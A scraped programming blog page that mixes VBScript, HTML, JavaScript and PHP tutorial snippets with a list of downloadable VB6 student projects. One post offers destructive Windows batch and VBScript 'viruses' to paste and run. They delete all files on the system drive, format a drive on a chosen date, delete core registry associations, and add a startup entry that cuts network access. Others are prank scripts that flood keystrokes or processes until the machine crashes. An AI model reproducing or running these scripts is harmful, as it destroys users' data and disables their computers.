<div style='background-color: none transparent;'></div>

Pages

The fight is not over!! MS is now moving .net to compile native, acknowledging the short comings in the .net framework. We need to demand a new vb6 that compiles our projects as they run today. Call, write, email, do what you can to put pressure on MS to bring back VB6!!! The new move by MS means they also acknowledge what we want is legitimate!!! Tell all your friends and colleagues to join in and help! Read more
Think Analytically, Verbalized what you have Thought, and Actualized what you had Verbalized... Read more
1 2 3 4 5 6 7
More Article »
More Article »

VBScript

Tuesday, September 8, 2015

VBScript Tutorial

Microsoft VBScript (Visual Basic Script) is a general-purpose, lightweight and active scripting language developed by Microsoft that is modelled on Visual Basic. Nowadays, VBScript is the primary scripting language for Quick Test Professional (QTP), which is a test automation tool.
This tutorial will teach you how to use VbScript scripting language in your day-2-day life of any Web based or Automation project development.

Audience

This tutorial has been prepared for the beginners to help them understand basic-to-advanced functionality of VBScript. After completing, this tutorial you will find yourself at a moderate level of expertise in using Microsoft VBScript from where you can take yourself to next levels.

Prerequisites

We assume you have a little knowledge of any computer programming and understand concepts like variables, constants, expression, statements, etc. If you have done programming in any client side language like Javascript, then it will be very much beneficial and learning VBScript will be like a fun for you.

Execute VBScript Online

For most of the examples given in this tutorial you will find Try it option, so just make use of this option to execute your VBScript programs at the spot and enjoy your learning.
Try following example using Try it option available at the top right corner of the below sample code box −
<html>
   <body>
      
      <script language="vbscript" type="text/vbscript">
         document.write("Hello World!")
      </script>
      
   </body>
</html>
Continue Reading | comments

another batch files cheer up!


IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file


>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


>>The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat
 


>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

It Only Works With Windows XP


>>Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


>>Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day


>>Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>>Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>>Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


What sex is your computer ?

-> open notepad
-> copy code
CreateObject("SAPI.SpVoice").Speak"I love YOU"

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it


Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
*paste any of the two above codes in notepad
*Save as “AnyFileName”.vbs
*Run the file
*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..
Continue Reading | comments

Learning HTML

Wednesday, September 2, 2015

HTML Introduction


What is HTML?

HTML is a markup language for describing web documents (web pages).
  • HTML stands for Hyper Text Markup Language
  • A markup language is a set of markup tags
  • HTML documents are described by HTML tags
  • Each HTML tag describes different document content


HTML Example.

A small HTML document:


<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

<h1>My First Heading</h1>
<p>My first paragraph.</p>

</body>
</html>

Example Explained.


  • The DOCTYPE declaration defines the document type to be HTML
  • The text between <html> and </html> describes an HTML document
  • The text between <head> and </head> provides information about the document
  • The text between <title> and </title> provides a title for the document
  • The text between <body> and </body> describes the visible page content
  • The text between <h1> and </h1> describes a heading
  • The text between <p> and </p> describes a paragraphHP files can contain text, HTML tags and scripts

Using this description, a web browser can display a document with a heading and a paragraph.

HTML Tags.

HTML tags are keywords (tag names) surrounded by angle brackets:

PHP + MySQL

PHP combined with MySQL are cross-platform (you can develop in Windows and serve on a Unix platform)

Why PHP?

PHP runs on different platforms (Windows, Linux, Unix, etc.)
PHP is compatible with almost all servers used today (Apache, IIS, etc.)
PHP is FREE to download from the official PHP resource: www.php.net
PHP is easy to learn and runs efficiently on the server side

Where to Start?

To get access to a web server with PHP support, you can:

Install Apache (or IIS) on your own server, install PHP, and MySQL
Or find a web hosting plan with PHP and MySQL support



HTML Basic

HTML Intro
PHP WhileLoops
PHP For Loops
PHP Functions
PHP Forms
PHP $_GET
PHP $_POST

PHP Advanced

PHP Date
PHP Include
PHP File
PHP File Upload
PHP Cookies
PHP Sessions
PHP E-mail
PHP Secure E-mail
PHP Error
PHP Exception
PHP Filter

PHP Database

MySQL Introduction
MySQL Connect
MySQL Create
MySQL Insert
MySQL Select
MySQL Where
MySQL Order By
MySQL Update
MySQL Delete
PHP ODBC

PHP XML

XML Expat Parser
XML DOM
XML SimpleXML

PHP and AJAX

AJAX Intro
AJAX PHP
AJAX Database
AJAX XML
AJAX Live Search
AJAX RSS Reader
AJAX Poll
Continue Reading | comments

JavaScript Tutorial

Tuesday, September 1, 2015

JavaScript is the programming language of HTML and the Web.
Programming makes computers do what you want them to do.
JavaScript is easy to learn.
This tutorial will teach you JavaScript from basic to advanced.

Why Study JavaScript?

JavaScript is one of the 3 languages all web developers must learn:
   1. HTML to define the content of web pages
   2. CSS to specify the layout of web pages
   3. JavaScript to program the behavior of web pages
This tutorial is about JavaScript, and how JavaScript works with HTML and CSS.

Learning Speed

In this tutorial, the learning speed is your choice.
Everything is up to you.
If you are struggling, take a break, or reread the material.
Always make sure you understand the "Try-it-Yourself" examples and exercises.
Edit This Code:
<!DOCTYPE html>
<html>
<body>
<h1>My First JavaScript</h1>
<button type="button"
onclick="document.getElementById('demo').innerHTML = Date()">
Click me to display Date and Time.</button>
<p id="demo"></p>
</body>

</html> 
Result:

My First JavaScript



after clicking the date and time shows below
Fri Sep 04 2015 12:54:18 GMT+0800 (Malay Peninsula Standard Time)

Continue Reading | comments

php System

Sunday, August 30, 2015

Simple inventory system using php/mysq

Click the thumbnail to download zip file
I developed this code to those beginner programmer who found difficulties in creating their inventory system using php/mysql. The feature of this system are, it generates daily inventory report, secure login because i use md5 encryption for login and registration . It also generate reports such as daily, weekly, monthly, and yearly. This system has many features not just the features written above. To try this system just download and run this system. If you have question, suggestion or anything, just leave comment and it's my pleasure to entertain your comments.


database name: liveedit

username: admin
password: admin


Simple Social Networking Sites
This is a Sample of A Social Networking Sites That Helps connect People to the one they truly Belong with. This Project Cannot Be Completed Without the Help of our Friends,Classmates,Family,our Teacher and Most of All Our Beloved God...





More updates coming soon...





Continue Reading | comments

Hard Code System Collection - Advance Visual Basic Programmers


Automated Voting System

Click the Thumbnail to Download
This is Automated Voting System created in Visual Basic 6.0. It can generate reports like canvassing report and voters report(tracking of which year and section has the most and least number that participate). The system is also capable of generating unique Student ID and password.

 

 

Sales and Inventory System

Click the Thumbnail to Download
This is a Sales and Inventory System created in Visual Basic 6.0, it is capable of giving an output of Sales Report, Inventory Report and Products Report. The program has the means of sorting out reports depending on your desired category.



Point of Sale and Inventory System using Barcode

Click the Thumbnail to Download
This system is mainly for the stores that are using barcode scanner. Can print custom barcodes for products that don't have one.

 

 

 

 

Car Spareparts Sales and Inventory System

Click the Thumbnail to Download
Car Spareparts Sales and Inventory System is a program that uses ADO and some good functionalities. It uses listview control in displaying list of records,flexgrid and other activex controls that beautify the interface of the system.
Download this code and you will learn more in Visual Basic programming, such as the used API in database programming, custom  functions and procedures to optimize your codes, data dynamic reporting, string manipulation and etc.

Simple Billing and Medical Records System

Click the Thumbnail to Download
This Simple Billing and Medical Records System is based on the process of Bacolod Diagnostic Center. Here, you can add and update patient information, calculate bills, encode and produce output for the Test Result. You can also retrieve past medical records of a specific patient.


Transmittal Recording Program

Click the Thumbnail to Download
Transmittal Recording Program - written in Visual Basic Classic







Payroll Management System

Click the Thumbnail to Download
This system is made with the Kenyan tax rates and the Kenyan deduction rates in mind. Therefore, the calculations for the deductions can only be used in Kenya.




POS and Inventory System

Click the Thumbnail to Download
Good day! fellow coders, my name is Leomar V. Ramos, and I'm sharing this piece
to you.This is a point of sales program with user management,supplier management,product categories,
product/items and etc.This program was written in Visual Basic with easy to understand coding techniques and user friendly interface.


Car/Auto Spareparts Management Operating System

Click the Thumbnail to Download
Sample program for Car/ Auto Sparepart Shop.







 

SMS Sending using Huawei Modem

Click the Thumbnail to Download
This simple program is capable of sending SMS using HUAWEI Dongle Modem (like Globe Tatoo USB Modem and alike) . The program is written in Visual Basic 6.0 using AT Commands...






POS Inventory System

Click the Thumbnail to Download
This is my project on System Analysis and Design.
POS Inventory System designed for Grocery and Super Market. this is my first complete application written in vb6. i hope this program will help on your projects and thesis. make this as your references.




Class Scheduling and Time Tabling System - VB6

Click the Thumbnail to Download
I would like to share here my Scheduling System, this system is only a part of my High School Enrollment System and my College Enrollment System that consist of 8 modules(registrar,grader,controller,scheduler,checker/assessor, collector/cashier,administrator, and the Web Transcript).
This system covers timetable for a school, high-school or university. It uses a fast and efficient timetabling algorithm.

Personnel/Employee Maintenance System

Click the Thumbnail to Download
EMPLOYEE MAINTENANCE..
Username : ADMIN
Password : ADMIN




Computerized Payroll System

Click the Thumbnail to Download
This program was created for LJME Engineering Services. Please comment and suggest






 

Hospital OPD System

Click the Thumbnail to Download
Hospital OPD System created in Classic VB and MS Access Database. This project is good for beginners for it offer a very simple design and coding.
Beginners, download now and don't forget to drop any comments for this post.
I hope this could help.
Happy coding coders!

 

ZEST Sales and Inventory Manager

Click the Thumbnail to Download
The stock management system of medical store is developed to overcome these most of the problems. By computerizing the system we can solve many problems which are exists in the manual system. After computerizing the system, they can finish their work in least amount of efforts. The computerized system has many gain & features which manual system can't give in any circumstances.


Fingerprint Scanner/Reader using Digital Persona

Click the Thumbnail to Download
This is a fingerprint scanner/reader that uses Digital Persona SDK. You can integrate this code if you have a Payroll System. The other version is GrFingerX.
You need the digital personal SDK before using this code. You can find this software at Digital Persona’s website.



ThumbSoft: Fingerprint Scanner/Reader using GrFingerX

Click the Thumbnail to Download
This is a fingerprint scanning system use for Daily Time Record. I am using GrFingerX library to scan the fingerprint.
You need to install the library from http://store.grfinger.com/Computer-Software/GrFinger-Fingerprint-SDK-2009-Free-Trial-30-Day.
I also include the GrFingerX.dll just in case the installer cannot register the library.


Class Scheduling System for Beginners

Click the Thumbnail to Download
Class Scheduling System - was created for beginners only. This program having the common functions in database manipulation such as (Add, Update, Delete, Search and Reloading records to fill the listview control).
This is good example to start database programming. Download now and drop your comments and suggestions.



Sample How to capture data from Magnetic Swipe Card reader/Credit Card Reader

Click the Thumbnail to Download
This Sample app shows how to use Magnetic card reader or credit card reader from MAGTEK
http://www.hallogram.com/barcodes/scanners/mag/
in your Windows based project in POS-Inventory, Payment using Credit Card Processing ,etc very useful for resto, gas stations, grocery   stores,etc.
This time we will be using their SDK/ Active X/ COM components provided by MAGTEK for this model in the link above instead of using MSComm Component or Serial port class (.NET).
Magnetic swipe card Overview

Library System

Click the Thumbnail to Download
Sample library system that will handle the basic functions or activities in the library.
Features of the system:
1. Book records management
2. Database Backup and Restore Utility
3. Report Generation (Book Inventory, User's log, etc)



 

Military Human Resource Management System

Click the Thumbnail to Download
I have Developed this application in this year: it supports Amharic(Ethiopian language) and English








 

Banking System

Click the Thumbnail to Download
ACE Banking System
--------------------------
1.Add New Account
2.Withdraw
3.Deposit
4.Transfer Amount One Account to Another
5.Close Account
In that Main Form The Title ACE Bank of India (R)
Here Double Click the Word (R)
And Give An User Name:admin
Password :admin
You can see the Account list

 

High School Enrollment System

Click the Thumbnail to Download
This system provides 5 modules.
1.) Enrollment Module - controller of subjects for student and etc.
2.) Registrar Module - student registration and etc.
3.) Cashier Module - Billing of accounts, payment of accounts, and other important reports
4.) Grader Module
5.) Administrative Module
This system also includes graphical scheduling procedure on room, subjects and teachers., Cashiering procedure, grader and many many more..


More updates coming soon...


-->

Click the VB 6.0 icon below to download Portable Editor...



Continue Reading | comments
 
Copyright © 2011. datasavvy . All Rights Reserved
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template Modify by Creating Website . Inpire by Darkmatter Rockettheme Proudly powered by Blogger